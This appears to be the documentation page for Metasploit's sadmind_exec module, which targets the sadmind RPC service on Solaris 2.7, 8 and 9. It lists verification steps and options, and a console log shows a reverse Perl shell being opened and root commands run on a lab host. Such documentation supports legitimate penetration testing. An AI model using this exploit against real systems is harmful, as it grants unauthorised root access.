adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
6d9d9a70d410cc94de4d3d9afd7a75cd426d43be
metasploit-gs/documentation/modules/exploit/solaris/sunrpc/sadmind_exec.md
T
cgranleese-r7 469f102596 Updates docs to reflect new default prompt
2025-07-17 09:53:40 +01:00

73 lines
2.1 KiB
Markdown
Raw Blame History

## Vulnerable Application
This exploit targets a weakness in the default security settings of
the Sun Solstice AdminSuite distributed system administration daemon
(sadmind) RPC application. This server is installed and enabled by
default on most versions of the Solaris operating system.
Vulnerable systems include Solaris 2.7, 8, and 9.
This module has been successfully tested on:
* Solaris 8 02/00 (x86);
* Solaris 8u1 06/00 (x86);
* Solaris 8u2 10/00 (x86);
* Solaris 8u3 01/01 (x86);
* Solaris 8u4 04/01 (x86);
* Solaris 9u2 12/02 (x86).
## Verification Steps
1. Start `msfconsole`
1. Do: `use exploit/solaris/sunrpc/sadmind_exec`
1. Do: `set rhosts [rhost]`
1. Do: `exploit`
1. You should get a new session as the `root` user.
## Options
### HOSTNAME
Remote hostname. The hostname will be detected automatically by default;
however, using the automatically detected hostname will fail if the system
hostname was changed after the sadmind service was started.
### GID
GID to emulate (default: `0`)
### UID
UID to emulate (default: `0`)
## Scenarios
### Solaris 8u1 06/00 s28x_u1wos_08 INTEL (x86)
```
msf > use exploit/solaris/sunrpc/sadmind_exec
msf exploit(solaris/sunrpc/sadmind_exec) > set rhosts 192.168.200.148
rhosts => 192.168.200.148
msf exploit(solaris/sunrpc/sadmind_exec) > set payload cmd/unix/reverse_perl
payload => cmd/unix/reverse_perl
msf exploit(solaris/sunrpc/sadmind_exec) > run
[*] Started reverse TCP handler on 192.168.200.130:4444
[*] 192.168.200.148:111 - Attempting to determine hostname
[*] 192.168.200.148:111 - Found hostname: unknown
[*] 192.168.200.148:111 - Sending payload (234 bytes)
[+] 192.168.200.148:111 - Exploit did not give us an error, this is good.
[*] Command shell session 1 opened (192.168.200.130:4444 -> 192.168.200.148:32810) at 2025-04-21 01:38:08 -0400
id
uid=0(root) gid=0(root)
uname -a
SunOS unknown 5.8 Generic_108529-01 i86pc i386 i86pc
cat /etc/release
Solaris 8 6/00 s28x_u1wos_08 INTEL
Copyright 2000 Sun Microsystems, Inc. All Rights Reserved.
Assembled 28 April 2000
```
Reference in New Issue View Git Blame Copy Permalink